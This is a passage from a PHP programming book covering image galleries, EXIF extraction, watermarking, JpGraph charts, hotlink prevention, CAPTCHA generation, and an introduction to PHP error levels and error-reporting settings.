  • 238. 214 The PHP Anthology How can I put together a simple thumbnail gallery? In the previous section, we investigated how to create thumbnails without causing your much-loved pooch to look like some strange dog–bat hybrid. Armed with that knowledge, it should be an easy task to build a simple thumbnail gallery from a directory that contains PNG, GIF, and JPEG files! Solution We’ll use the Thumbnail class we created in the previous section, together with PHP’s built-in dir pseudo-class (refer to the section called “Using the dir Pseudo-Class” in Chapter 6 for more information on the dir pseudo-class) to create our gallery. We simply read through the directory, look for images that don’t have thumbnails, and create them; at the same time, we generate the HTML that will display them. An important benefit of this approach (creating and storing thumbnails on the disk) is that it saves us the overhead of having to create the thumbnails dynamically each time. The first step we need to take, of course, is to include our Thumbnail class and initialize our $image_html variable to an empty string: thumbGallery.php (excerpt) <?php require_once('Thumbnail.class.php'); $image_html = ''; The $image_html variable will eventually hold all the HTML for our gallery. Next, we use the dir pseudo-class to get a Directory object for our sample_images directory. This object allows us to start a while loop, which will loop over all the directory entries within sample_images: thumbGallery.php (excerpt) $dir = dir('sample_images'); // Compare against false explicitly so that an entry named "0" doesn't end the loop early while (false !== ($image = $dir->read())) {
  • 239. Images 215 Each loop will assign the next directory entry, obtained using the $dir->read method, to the $image variable. When there are no more directory entries, the loop will terminate. Next, we check that the directory entry we’ve obtained is an image file we want to include in our gallery: thumbGallery.php (excerpt) $ext = explode('.',$image); $size = count($ext); if (($ext[$size-1] == 'png' || $ext[$size-1] == 'jpg' || $ext[$size-1] == 'gif') && !preg_match('/^thumb_/', $image) && $image != '.' && $image != '..') { To check that the current directory entry is an image we want to include in our gallery, we first examine the file extension to ensure it’s a .png, .jpg, or .gif. We then make sure that the filename doesn’t begin with thumb_, which would indicate that it’s one of our thumbnails, and that the entry is not the . or .. directory entry. Provided these conditions are met, we proceed to create the thumbnail: thumbGallery.php (excerpt) if ( !file_exists('sample_images/thumb_'.$image) ) { $tn = new Thumbnail(200, 200, true, false); $tn->loadFile('sample_images/'.$image); $tn->buildThumb('sample_images/thumb_'.$image); } First, we check to make sure a thumbnail doesn’t already exist for the current image. Then, we create a new thumbnail with our Thumbnail class and save it, prepending thumb_ to the filename. The last step inside the while loop adds the HTML markup for the current image:
  • 240. 216 The PHP Anthology thumbGallery.php (excerpt) $image_html .= '<div class="image">' . '<a href="sample_images/'.$image.'">' . '<img src="sample_images/thumb_'.$image.'">' . '</a></div>'; } } ?> The HTML for the gallery page is quite simple; once the layout and the CSS style sheet have been created, the markup for the images is output from the $image_html variable: thumbGallery.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Thumbnail Example </title> <style type="text/css"> ⋮ insert attractive visual style here… </style> </head> <body> <h1>Gallery</h1> <?php echo ( $image_html ); ?> </body> </html> An example of this script’s output appears in Figure 8.4.
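The filename test used inside the gallery loop can also be written as a single helper. The following is a minimal sketch rather than the gallery's actual code: the function name isGalleryImage is hypothetical, and accepting upper-case and .jpeg extensions is an assumption added for illustration.

```php
<?php
/**
 * Hypothetical helper: decide whether a directory entry belongs in the
 * gallery. Returns false for thumbnails and for non-image files.
 */
function isGalleryImage($filename)
{
    // Skip thumbnails generated on an earlier run
    if (strpos($filename, 'thumb_') === 0) {
        return false;
    }

    // pathinfo() gives an empty string when the name has no extension;
    // lower-casing lets "Terrier.JPG" match as well
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));

    return in_array($ext, array('png', 'jpg', 'jpeg', 'gif'), true);
}

var_dump(isGalleryImage('Terrier.JPG'));       // bool(true)
var_dump(isGalleryImage('thumb_terrier.jpg')); // bool(false)
```

Inside the while loop, a call such as if (isGalleryImage($image)) { … } could stand in for the longer condition built with explode and preg_match.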
  • 241. Images 217 Figure 8.4. Our thumbnail gallery How do I extract EXIF information from images? Now that you have a functional gallery, you might like to provide visitors with extra information about the photo. The exchangeable image file format, better known as EXIF format, provides a mechanism for the storage of metadata within images; most digital cameras and image editing applications support this facility natively. If you’ve taken some of the images in your photo gallery with your digital camera, you can extract the EXIF data, such as date and time of the photo, the camera model, and the camera settings used, and display it alongside the shots. Solution Extracting this information is simplicity itself when you seek a little help from PHP’s EXIF functions. To use the EXIF functions you need to ensure your PHP installation
  • 242. 218 The PHP Anthology has EXIF support enabled. Please read the instructions on the EXIF functions manual page.7 The exif_read_data function reads all the meta information from a JPEG or TIFF image into an array. Take a look at this example: exif.php (excerpt) <?php // Get the exif data $exif_data = exif_read_data( 'sample_images/terrier.jpg' ); echo '<pre>'; print_r($exif_data); echo '</pre>'; ?> The above code displays all the EXIF information available for an image. For the sake of brevity, as there’s a lot of meta information in the array, here’s a subset of the information available to us: Array ( [FileName] => terrier.jpg [FileDateTime] => 1185158396 [FileSize] => 46196 [FileType] => 2 [MimeType] => image/jpeg [Make] => FUJIFILM [Model] => FinePix S9500 [ExposureTime] => 10/520 [FNumber] => 390/100 [ISOSpeedRatings] => 80 [ShutterSpeedValue] => 576/100 ) Let’s take this information and update the output for the gallery we built in “How can I put together a simple thumbnail gallery?”. All we need to do is modify the code that generates the markup in the $image_html variable, like so: 7 http://www.php.net/exif/
  • 243. Images 219 exifGallery.php (excerpt) if($ext[$size-1] == 'jpg') { $exif_data = exif_read_data( 'sample_images/' . $image ); } else { $exif_data = array(); } $image_html .= '<div class="image">'; $image_html .= '<div class="thumbnail">'; $image_html .= '<a href="sample_images/' . $image . '">'; $image_html .= '<img src="sample_images/thumb_' . $image . '">'; $image_html .= '</a></div>'; $image_html .= '<div class="exifdata">'; if(isset($exif_data['FileDateTime'])) { $image_html .= '<p>Date: ' . date( 'jS F Y', $exif_data['FileDateTime'] ) . '</p>'; } if(isset( $exif_data['Make'])) { $image_html .= '<p>Taken with: ' . $exif_data['Make']; if(isset($exif_data['Model'])) { $image_html .= ' ' . $exif_data['Model']; } $image_html .= '</p>'; } $image_html .= '</div></div>'; In the above modification to our gallery, if the image is a JPEG image, we add to the display the file’s date, and the make and model of the camera that was used, if those details are available. Note that FileDateTime is the file’s modification timestamp; the moment the shot was taken is stored separately, typically in the DateTimeOriginal field, when the camera records it. As you can see, the EXIF data appears beneath the appropriate images in Figure 8.5.
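Several values in the sample EXIF output, such as ExposureTime and FNumber, arrive as fraction strings like 390/100. If you want to display them as ordinary numbers, a small conversion helper is enough. This is a sketch only; the function name exifRationalToFloat is hypothetical and is not part of PHP's EXIF extension.

```php
<?php
/**
 * Hypothetical helper: turn an EXIF rational such as "390/100" into a
 * float. Returns null when the value is missing or malformed.
 */
function exifRationalToFloat($value)
{
    // Not a "numerator/denominator" string: accept plain numbers, reject the rest
    if (!is_string($value) || !preg_match('#^(-?\d+)/(\d+)$#', $value, $m)) {
        return is_numeric($value) ? (float) $value : null;
    }

    // Guard against division by zero
    if ((int) $m[2] === 0) {
        return null;
    }

    return (float) $m[1] / (float) $m[2];
}

// FNumber from the sample output shown earlier
printf("f/%.1f\n", exifRationalToFloat('390/100')); // prints "f/3.9"
```

Because the helper returns null for anything it cannot parse, the calling code can simply skip the field, in the same spirit as the isset checks in the gallery script.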
  • 244. 220 The PHP Anthology Figure 8.5. The thumbnail gallery displaying images’ EXIF data How do I add a watermark to an image? So, you really like your photos, and you want to protect them with a watermark. That is, you want to place some identifying image or text within the original image to show that you own the copyright to it. With the GD library and PHP, watermarking’s a snap! Solutions The imagestring function can be used to place text within an image, while the imagecopymerge function can be used to place another image within your original image. Using either of these functions is extremely easy. Displaying a Text Watermark Adding text to an image is the simplest form of watermarking. Here’s how it works:
  • 245. Images 221 textWatermark.php (excerpt) <?php $image = imagecreatefromjpeg('sample_images/thumb_terrier.jpg'); $color = imagecolorallocate($image, 68, 68, 68); imagestring($image, 5, 90, 0, "Abbey '07", $color); header('Content-Type: image/jpeg'); imagejpeg($image); ?> The imagecolorallocate function allows you to create a new color to use for drawing on the image by specifying the red, green, and blue components. The function returns a number, which identifies that color in the image. Once you have the color in hand, you can use the imagestring function to place the text over the image. The first of the function’s arguments is the image, and the second is a font number; the numbers 1–5 refer to built-in fonts. You can use imageloadfont to make other fonts available. The third and fourth arguments represent the horizontal and vertical coordinates at which the text should be drawn on the image. The fifth argument contains the text you wish to be placed in the image, and the last argument specifies the color of the text. The output of this script is shown in Figure 8.6. Figure 8.6. Applying a text watermark Displaying a Graphical Watermark A logo or some other identifiable graphic with a transparent background is easily placed over another image. Here’s an example:
  • 246. 222 The PHP Anthology imageWatermark.php (excerpt) <?php $image = imagecreatefromjpeg('sample_images/thumb_terrier.jpg'); $iWidth = imagesx($image); $watermark = imagecreatefrompng( 'sample_images/sitepoint_watermark.png'); $wmWidth = imagesx($watermark); $wmHeight = imagesy($watermark); $xPos = $iWidth - $wmWidth; imagecopymerge($image, $watermark, $xPos, 0, 0, 0, $wmWidth, $wmHeight, 100); header('Content-Type: image/png'); imagepng($image); ?> The process is a simple matter. Load the original image and the watermark image; then, once the original image’s width and the watermark’s width and height have been obtained, use imagecopymerge to place the watermark on the original image. The first two arguments to the imagecopymerge function are the original or destination image object, and the source image object (the watermark, in our case). The next four arguments represent the x and y coordinates of the destination image and source image respectively, starting from the top-left corner of the images. The following two arguments represent the width and height of the source image. The last argument sets how strongly the watermark is merged into the destination image, as a percentage: an argument of 100 copies the watermark at full strength, while an argument of 0 causes the original image to remain unmarked by the watermark. The result, in this case, is shown in Figure 8.7: a miniature SitePoint logo appears in the upper-right corner of the photo.
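The script above pins the watermark to the upper-right corner by subtracting the watermark's width from the image's width. The same idea extends to any corner. Here is a minimal sketch; the function name watermarkPosition, the corner keywords, and the $margin parameter are all hypothetical and chosen only for this illustration.

```php
<?php
/**
 * Hypothetical helper: top-left coordinates for a watermark placed in a
 * given corner of the image, inset by $margin pixels.
 */
function watermarkPosition($imgW, $imgH, $wmW, $wmH, $corner = 'top-right', $margin = 0)
{
    $right  = (strpos($corner, 'right') !== false);
    $bottom = (strpos($corner, 'bottom') !== false);

    $x = $right  ? $imgW - $wmW - $margin : $margin;
    $y = $bottom ? $imgH - $wmH - $margin : $margin;

    // Clamp so an oversized watermark never yields negative coordinates
    return array(max(0, $x), max(0, $y));
}

list($x, $y) = watermarkPosition(200, 150, 60, 20);
echo "$x,$y\n"; // prints "140,0"
```

The two returned values would take the place of the destination x and y arguments (the third and fourth) in the call to imagecopymerge.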
  • 247. Images 223 Figure 8.7. Applying a graphical watermark How do I display charts and graphs with PHP? The display of data in graphical form is a powerful way to communicate with your site’s visitors, and can help you to understand exactly how your site’s being used. The graphs could show any relevant data, including your site’s monthly traffic statistics, or counts of sales made on your site. Solutions A number of projects extend PHP’s basic capabilities to render images, allowing data to be displayed as some form of graph or chart. First and foremost is a project written in PHP that makes full use of the GD library and PHP’s image functions: the excellent JpGraph library.8 You can do a lot with JpGraph, and to provide a detailed examination is beyond the scope of this book. At over 1MB in size, the documentation is extremely thorough, and offers many useful examples. If you’re looking for more advanced reading on JpGraph, I recom­ mend two articles by Jason E. Sweat: one at Zend Developer Zone,9 the other at php | architect.10 Here, however, we’ll get a feel for the library as we use it to display bar and pie charts for a given set of data. Be aware that JpGraph is licensed free for noncommercial use only—make sure you read the licensing information on the site. The version I’ll use in this example is 2.2, which only works on PHP versions 5.1.0 and above. If you’re using PHP 4, you’ll need to download version 1 of JpGraph. The code here also assumes that 8 http://www.aditus.nu/jpgraph/ 9 http://devzone.zend.com/node/view/id/1260/ 10 http://www.phparch.com/issuedata/2003/apr/sample.php
  • 248. 224 The PHP Anthology you’ve added the jpgraph/src/ directory to your PHP include path, to allow the Jp- Graph class files to be loaded. JpGraph and PHP Error Notices You may run into trouble using JpGraph if you have PHP’s error notices switched on in php.ini. The generated error messages can cause the graph image to fail to display. The examples in this chapter explicitly disable notices in order to avoid this problem. See Chapter 9 for more information on how to control error reporting. Creating a Bar Graph First, let’s see how we can generate a bar graph with JpGraph: bargraph.php (excerpt) <?php error_reporting(E_ALL ^ E_NOTICE); require_once ('jpgraph.php'); require_once ('jpgraph_bar.php'); $xdata = array('Mousemats','Pens','T-Shirts','Mugs'); $ydata = array (35,43,15,10); First, we turn off E_NOTICE reporting; then we include the core “engine” as well as the bar graph class (make sure you have it in your PHP include path). Next, we set up two arrays of sample data that will be plotted on the x and y axes of the graph. In a practical application, these might be results you’ve fetched from MySQL. The JpGraph API is fairly self-explanatory, and comes with excellent quality docu­ mentation. The first step in generating a graph from our data arrays is to set up the foundations of the graph itself, setting its size and background color: bargraph.php (excerpt) // Width, height,cache filename $graph = new Graph(400,200,'auto'); // Margin widths $graph->img->SetMargin(40,20,20,40); // X text scale, Y linear scale
  • 249. Images 225 $graph->SetScale('textlin'); // Plot background $graph->SetColor('white'); // Margin color $graph->SetMarginColor('darkgray'); // Use a drop shadow $graph->SetShadow(); // Frame color $graph->SetFrame(true,'black'); It’s no problem to add a title to the graph. JpGraph comes with three built-in bitmap fonts, two of which can be displayed in bold, as well as built-in support for a number of TrueType fonts.11 Note that the TrueType fonts aren’t packaged with JpGraph—they must be available separately, as part of your operating system fonts. Next, we set the graph’s title: bargraph.php (excerpt) // Title text $graph->title->Set('Sales Figures for March'); // Title color $graph->title->SetColor('white'); // Title font $graph->title->SetFont(FF_VERDANA,FS_BOLD,14); Now, let’s construct the x axis. Here, the labels are assigned using the SetTickLabels method, ticks being the markers for each interval on the x axis: bargraph.php (excerpt) // Axis title text $graph->xaxis->title->Set('Product Type'); // Axis title color $graph->xaxis->title->SetColor('black'); // Axis title font $graph->xaxis->title->SetFont(FF_VERDANA,FS_BOLD,10); // Add labels $graph->xaxis->SetTickLabels($xdata); 11 These include Courier, Verdana, Times, Comic, Arial, Georgia, Trebuchet, Gnome Vera, Chinese, Ja­ panese, and Hebrew fonts.
  • 250. 226 The PHP Anthology // Axis colors $graph->xaxis->SetColor('black','white'); // Axis font $graph->xaxis->SetFont(FF_VERDANA,FS_NORMAL,8); // Hide ticks $graph->xaxis->HideTicks(); The y axis will take numeric values that are generated automatically once the y data is added: bargraph.php (excerpt) // Axis title text $graph->yaxis->title->Set('Units Sold'); // Axis title color $graph->yaxis->title->SetColor('black'); // Axis title font $graph->yaxis->title->SetFont(FF_VERDANA,FS_BOLD,10); // Axis colors $graph->yaxis->SetColor('black','white'); // Axis font $graph->yaxis->SetFont(FF_VERDANA,FS_NORMAL,8); // Hide ticks $graph->yaxis->HideTicks(); In the following code, we create a new BarPlot object that handles the drawing of the bars on the chart: bargraph.php (excerpt) // Instantiate with Y data $bplot = new BarPlot($ydata); // Width of bars $bplot->SetWidth(0.75); // Set bar background color $bplot->SetFillColor('darkgray'); All that remains is to add the bar chart plot object to the graph object, and send it to the browser:
  • 251. Images 227 bargraph.php (excerpt) $graph->Add($bplot); $graph->Stroke(); ?> Figure 8.8 shows the outcome—it’s not bad for just 33 lines of PHP, is it? Figure 8.8. Graph revealing a massive demand for pens in March Creating a Pie Chart Another type of graph that can be built very easily with JpGraph is the pie chart. Let’s use the sample data we used in the last example to build a pie chart. At the start of the script, we must include the main pie chart class and the class for a three-dimensional pie chart: piechart.php (excerpt) <?php error_reporting(E_ALL ^ E_NOTICE); require_once ('jpgraph.php'); require_once ('jpgraph_pie.php'); require_once ('jpgraph_pie3d.php'); $xdata = array('Mousemats','Pens','T-Shirts','Mugs'); // X Axis $ydata = array (35,43,15,10); This time, rather than using the Graph class, we use the PieGraph class:
  • 252. 228 The PHP Anthology piechart.php (excerpt) // Width, height, cache filename $graph = new PieGraph(400,200,'auto'); // Margin color $graph->SetMarginColor('white'); // Use a drop shadow $graph->SetShadow(); // Frame color $graph->SetFrame(true,'black'); We set this chart’s title as we did for the previous graph: piechart.php (excerpt) // Title text $graph->title->Set('March Sales'); // Title color $graph->title->SetColor('black'); // Title font $graph->title->SetFont(FF_VERDANA,FS_BOLD,14); We also need a legend to identify what each segment of the pie chart represents: piechart.php (excerpt) // Legend text color $graph->legend->SetColor('black'); // Legend background color $graph->legend->SetFillColor('gray'); // Legend position $graph->legend->Pos(0.02,0.61); Now, we create the three-dimensional pie chart object; we instantiate it with the y data while using the x data for the legends, and pop out two of the pie slices for effect:
  • 253. Images 229 piechart.php (excerpt) // Instantiate 3D pie with Y data $pie = new PiePlot3d($ydata); // Add X data to legends $pie->SetLegends($xdata); // Set color theme (earth|pastel|sand|water) $pie->SetTheme('earth'); // Center relative to X axis $pie->SetCenter(0.36); // Size of pie radius in pixels $pie->SetSize(100); // Set tilt angle of pie $pie->SetAngle(30); // Pop out a slice $pie->ExplodeSlice(2); // Pop out another slice $pie->ExplodeSlice(3); We’ll display a label next to each segment on the chart to identify the percentage of the whole that segment represents: piechart.php (excerpt) // The font $pie->value->SetFont(FF_VERDANA,FS_NORMAL,10); // Font color $pie->value->SetColor('black'); Finally, we add our pie chart object to the graph object and send it to the browser: piechart.php (excerpt) $graph->Add($pie); $graph->Stroke(); ?> The result of our work is shown in Figure 8.9.
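If you would like to check the percentage labels by hand, the arithmetic is simply each value divided by the total. The sketch below uses the sample data from this example; the function name slicePercentages is hypothetical, and the code shows only the calculation, not how JpGraph produces its labels internally.

```php
<?php
$xdata = array('Mousemats', 'Pens', 'T-Shirts', 'Mugs');
$ydata = array(35, 43, 15, 10);

/**
 * Hypothetical helper: share of the total for each value, as a
 * percentage rounded to one decimal place.
 */
function slicePercentages(array $values)
{
    $total = array_sum($values);
    $percentages = array();

    foreach ($values as $value) {
        // Avoid dividing by zero when every value is 0
        $percentages[] = $total > 0 ? round($value / $total * 100, 1) : 0.0;
    }

    return $percentages;
}

// Print one "label  percentage" row per slice
foreach (array_combine($xdata, slicePercentages($ydata)) as $label => $pct) {
    printf("%-10s %5.1f%%\n", $label, $pct);
}
```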
  • 254. 230 The PHP Anthology Figure 8.9. The not-so-humble pie chart Discussion JpGraph represents the premier graphing solution for PHP, and it offers much more functionality than we’ve had a chance to explore with these examples. Of particular note is the fact that this solution allows you to store the rendered graphs as PNG files, so that you can render each graph once and reuse the finished image. If you wanted to save the graph created by the code above, you’d simply change the call to Stroke by supplying a filename, making sure that the web server has permission to write to this location. Here’s an example: $graph->Stroke('humble_pie.png'); This process will create a file called humble_pie.png, and won’t return anything to the browser. How do I prevent the hotlinking of images? One problem you may encounter, particularly if your site hosts unique images, is other sites that hotlink to your images from their pages, in order to make it seem as though they own or host your cool images. Aside from the potential copyright issues here, hotlinking of your images by outside sites may also eat up your bandwidth. Hotlinking is to be avoided like the plague, as I’m sure you’ll agree! Solutions Here we have two solutions; one uses the mod_rewrite extension to Apache and the other uses PHP sessions.
  • 255. Images 231 Using Apache’s mod_rewrite The default behavior of a web browser is to send a referer value with each HTTP request. This value represents the URL from which the current request originated. For HTTP requests for images, this URL should reflect the page on which the images appear. We can have Apache check the referral information that the visiting browser provides, to ensure that the referring source for all requests for our site’s images is a local web page. (Strictly speaking, the directives shown here are provided by Apache’s mod_setenvif and host-based access control modules rather than by mod_rewrite itself.) For example, we can place these settings in our web server’s httpd.conf file: SetEnvIfNoCase Referer "^http://www.sitepoint.com/" locally_linked=1 SetEnvIfNoCase Referer "^http://sitepoint.com/" locally_linked=1 SetEnvIfNoCase Referer "^$" locally_linked=1 <FilesMatch "\.(gif|png|jpe?g)$"> Order Allow,Deny Allow from env=locally_linked </FilesMatch> Here, we indicate that any request for a file with a name that ends in .gif, .png, .jpeg, or .jpg, and whose referer field begins with http://www.sitepoint.com/ or http://sitepoint.com/, or is blank, should be considered valid. Any image request whose referer field matches none of those values is therefore blocked. We need to allow requests with a blank referer field, as they could be legitimate requests; it’s likely that some requests won’t have referer information. For example, it’s entirely reasonable for a visitor to your web site to have disabled the reporting of referer information for privacy reasons. In short, the field cannot be relied upon to determine that hotlinking is taking place; rather than risk blocking images for what may be a legitimate request, we need to allow such requests. Using PHP Sessions Another option is to use PHP sessions to establish that the person viewing the image is a visitor to your site.
The trick is to register a session variable that a visitor must have in order to be able to view the image, then use a second script to render the image. For example, here’s a simple web page that displays an image, where the image source URL is a PHP script that ensures that only valid site visitors can see the image:
  • 256. 232 The PHP Anthology hotlinking.php (excerpt) <?php session_start(); $_SESSION['viewImages'] = true; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Preventing Hotlinking</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> </head> <body> <p>Here is the image:</p> <img src="getimage.php?img=husky.jpg"> </body> </html> Notice that this code registers a session variable called viewImages, and a value of getimage.php?img=husky.jpg appears in the src attribute of the <img> tag. Here’s the code for that getimage.php script. Firstly, we check the viewImages session variable to see that it has been set to true: getimage.php (excerpt) <?php session_start(); if (isset($_SESSION['viewImages']) && $_SESSION['viewImages'] == true) { If the viewImages session variable has been set to true, the image name provided via the $_GET['img'] variable is checked to ensure that it’s registered in the array of allowed images, $images:12 12 A more practical alternative is to store the list of images in a database. However you manage the list, it’s important to verify that the file requested is one you intended to grant access to; otherwise, you may be allowing access to more than you expect.
  • 257. Images 233 getimage.php (excerpt) $images = array( 'golden_retriever.jpg', 'husky.jpg' ); if (isset($_GET['img']) && in_array($_GET['img'],$images)) { The request is valid, so we output the response headers and the image: getimage.php (excerpt) $dims = getimagesize('sample_images/'.$_GET['img']); header('Content-Disposition: inline; filename=' . $_GET['img']); header('Content-Type: '.$dims['mime']); # PHP 4.3.x + header('Content-Length: ' . filesize('sample_images/' . $_GET['img'])); readfile('sample_images/'.$_GET['img']); } Notice that the script also uses the getimagesize function you saw earlier in “How do I resize images without stretching them?” to obtain the correct MIME type for the image. Finally, we handle the error conditions by returning an HTTP status of 404 Not Found: getimage.php (excerpt) else { header("HTTP/1.1 404 Not Found"); header("Content-Type: text/plain" ); echo "Invalid image or no image specified\n"; } } else { header("HTTP/1.1 404 Not Found"); header("Content-Type: text/plain" );
  • 258. 234 The PHP Anthology echo "This image is protected from hotlinking\n"; } ?> This protection should stop all but the most determined hotlinkers. How do I create images that can be verified by humans only? With the ever-growing number of automated spamming robots that tirelessly scour the Web, human-verification techniques are becoming an increasingly necessary part of the creation of web forms. The most common technique is the Completely Automated Public Turing Test to Tell Computers and Humans Apart (conveniently abbreviated to CAPTCHA), which presents the visitor with a word, or sequence of characters, in such a way that it’s hard for machines to decipher, but easy for a human being to read and type in.13 Solution Conveniently, the JpGraph library we discussed in “How do I display charts and graphs with PHP?” comes with an extremely easy-to-use CAPTCHA implementation: captcha.php (excerpt) <?php require_once "jpgraph_antispam.php"; $spam = new AntiSpam(); $chars = $spam->Rand(6); $spam->Stroke(); ?> A sample result of this script is shown in Figure 8.10. Figure 8.10. A CAPTCHA image created using JpGraph 13 You can read more about CAPTCHA at the official web site: http://www.captcha.net/.
  • 259. Images 235 If you want to specify a particular word to appear in the box, simply replace the call to Rand with: $spam->Set("my_string"); Discussion Of course, this is only half the story. You’ll need to store the CAPTCHA text somewhere (such as within a session variable) in order to validate the user-entered version of the text on the next page. Don’t pass the text through as a form field, though, even a hidden one, as it could be altered by a malicious user. Summary In this chapter, we’ve examined the topics of MIME types, resizing images, creating galleries, extracting EXIF information, watermarking, producing graphical charts, preventing the hotlinking of your images, and creating CAPTCHA images. Add the tips from other chapters in this book into the mix, and you’re well equipped to create a host of image manipulation scripts, from the downright useful to the truly unique. However, one issue you should consider is the performance implications of on-the-fly image manipulation, which chews through a significant amount of processing time. Consider a gallery of 100 folders, each holding 100 images; this isn’t a particularly excessive number, even for the casual holiday-maker. The creation of 10,000 thumbnails for every visitor is not a small task. Similarly, creating your company web site’s banner image for every page load is not only time-consuming, but also largely unnecessary. While the simple thumbnail caching techniques we covered here might suit many cases, they won’t be appropriate for those instances where the image might change over time; the creation of charts based on ever-changing datasets is a case in point. I highly recommend you refer to Chapter 11 for more advanced performance improvement techniques. The practice of manipulating images in PHP is widespread. 
Examples include social networking sites that create thumbnails of your profile image, web page forms that make use of CAPTCHA images, and photo gallery sites that allow you to edit, crop,
  • 260. 236 The PHP Anthology and rotate your images in the web browser (most likely through the liberal sprinkling of JavaScript and Ajax). What you can achieve is, more or less, only limited by your imagination!
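Returning to the caching caveat raised in the summary: a stored thumbnail goes stale when its source image changes. One simple way to cope is to compare file timestamps before reusing the cached copy. The following is a minimal sketch under that assumption; the function name thumbnailIsStale is hypothetical, and Chapter 11 covers more robust approaches.

```php
<?php
/**
 * Hypothetical helper: true when the cached thumbnail is missing, or is
 * older than its source image, and should therefore be regenerated.
 */
function thumbnailIsStale($sourcePath, $thumbPath)
{
    // PHP caches stat results; clear them so we see current timestamps
    clearstatcache();

    if (!file_exists($thumbPath)) {
        return true;
    }

    return filemtime($sourcePath) > filemtime($thumbPath);
}
```

In the gallery script, a check like this could take the place of the plain file_exists test, so that replacing sample_images/terrier.jpg with a new photo causes its thumbnail to be rebuilt on the next visit.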
  • 261. Chapter 9 Error Handling In PHP, errors are used to indicate syntax, environmental, or programming problems:
syntax errors: These are unrecoverable compile-time errors that indicate a syntax problem and cause the PHP interpreter to halt.
environmental errors: Environmental errors are problems associated with the script’s runtime environment and associated services. Such errors may indicate a database server being unavailable, a file that’s unable to be opened, restrictions resulting from permission levels, and so on.
programming errors: Programming errors are unexpected events that occur during normal program execution. This type of error may indicate, for example, passing unexpected arguments to a function call (such as an array when the function expects a string), referencing undefined variables or array indices, and so on.
  • 262. 238 The PHP Anthology The Logic Error Another type of error—the logic error—is common but much harder to detect. Such an error produces an incorrect result as the output of apparently successful execution. These types of errors are often program design problems created by the programmer. They’re generally addressed during unit testing, and will not be covered in this chapter. Errors in PHP 5 come in two flavors: standard PHP errors and exceptions. Standard PHP error reporting handles all kinds of errors. Error messages are reported globally, and each is associated with an error level that represents the error’s severity or type. Traditionally, PHP environmental and programming errors were handled via a function’s return value, or by generating global warnings or fatal errors using the trigger_error or die functions. However, this was typically only the case for developers using versions prior to PHP 5, in which no other error reporting method was available. In PHP 5, exceptions are used to indicate that an exceptional event—for example, an environmental or programming error—has occurred, disrupting the normal exe­ cution of the script. Exceptions are reported using the throw statement, usually to indicate that execution cannot continue as expected. They’re caught and handled using a try {…} catch(Exception $e) {…} block, which is included as part of programming logic. Throwing and catching exceptions is the primary error-handling mechanism of object oriented programming. Every exception object is an instance of, or an instance of a subclass of, PHP 5’s native Exception class. In this chapter, we’ll look at the flexibility PHP offers in order to let us extend its native error- and exception-reporting mechanisms. We’ll also see how you can harness these mechanisms to gain greater control over the ways in which errors and exceptions are handled. 
These tools will help you when you’re dealing with errors, and provide you the means with which to gracefully exit execution, easily debug your applications, and successfully monitor the health of your applications. What error levels does PHP report? As I noted in the introduction, PHP errors fall into a variety of categories. Effective harnessing of PHP’s error-handling mechanisms requires some knowledge of PHP
  • 263. Error Handling 239 errors, so let’s take a quick look at a summary of PHP error levels. You may also want to check out the PHP error function manual page for full information on this topic.1 Solution PHP categorizes errors into various levels, each represented by an integer constant that acts as a bit flag, so that levels can be combined and masked with bitwise operators. The numeric value is not a measure of severity: E_ERROR, for example, has the value 1, while E_NOTICE has the value 8. The error levels most developers need to understand are shown in Table 9.1.2 What built-in settings does PHP offer for error handling? If PHP can generate errors, there must be some automated way to handle these errors, right? Providing error reporting facilities without the capabilities to handle the errors leaves developers hobbled. So, what error handling settings are available to developers? Solutions PHP has several built-in mechanisms for displaying and logging errors. Each of the following directives may be administered via ini_set, your web server’s .htaccess file, or the php.ini file. The error_reporting Directive Set the error_reporting directive to indicate which errors need to be reported. During development, you’d typically set this directive to E_ALL | E_STRICT, which will notify you of any PHP errors that occur in your application. Once your code moves to the production environment, you may want to tighten this setting up a bit so that your error logs (which we’ll discuss in detail in a moment) don’t fill up; E_ERROR | E_USER_ERROR | E_WARNING | E_USER_WARNING is usually a good setting for production environments. 1 http://www.php.net/errorfunc/ 2 Note that the _USER variants indicate errors that are triggered in user code by trigger_error, and that are of a roughly equivalent level of severity.
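Because the error levels are bit flags, the production setting suggested above is just several constants combined with the bitwise OR operator, and you can test a mask with a bitwise AND. Here is a minimal sketch; the variable names and the reportsLevel helper are hypothetical. It uses E_ALL alone for development, since in PHP 5.4 and later E_ALL already includes E_STRICT.

```php
<?php
// Development: report everything
$development = E_ALL;

// Production: fatal errors and warnings only, as suggested in the text
$production = E_ERROR | E_USER_ERROR | E_WARNING | E_USER_WARNING;

/**
 * Hypothetical helper: does the given reporting mask include $level?
 */
function reportsLevel($mask, $level)
{
    return ($mask & $level) === $level;
}

// Apply the production mask, then inspect the active setting
error_reporting($production);

var_dump(reportsLevel(error_reporting(), E_WARNING)); // bool(true)
var_dump(reportsLevel(error_reporting(), E_NOTICE));  // bool(false)
```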
Table 9.1. PHP Error Levels

Level: E_NOTICE / E_USER_NOTICE
Description: This notice indicates a potential error in the script (note my emphasis on potential). Errors of this sort typically mean that something has occurred that may indicate logical errors or omissions, even though it hasn’t caused the PHP interpreter to fail. Examples include accessing undefined variables or array indices.

Level: E_WARNING / E_USER_WARNING
Description: A warning indicates a nonfatal error from which PHP has recovered. Warnings are generally reserved for environmental errors, such as the inability of the executing script to access a database or web service, errors that occur while you’re running a third-party extension, and so on.

Level: E_ERROR / E_USER_ERROR
Description: These are fatal runtime errors from which PHP was unable to recover; typically, they will be errors that occur on the OS level, such as problems encountered while allocating memory or disk space. Note that E_USER_ERRORs are actually recoverable; when such errors are caught in a custom error handler, the developer can choose whether or not to exit script execution.

Level: E_STRICT
Description: E_STRICT errors are basically notices, but these are deployed to indicate that code you’ve used may be deprecated, or may not follow best practices as determined by the PHP interpreter.

The display_errors Directive

When display_errors is set, PHP errors will be displayed inline in your script’s output. This is a good setting to use in development, though it has the potential to disrupt any HTTP headers you’re trying to send if an error occurs while they are being output.

Once your application’s in production, turn display_errors off so that these messages are not displayed to your users.
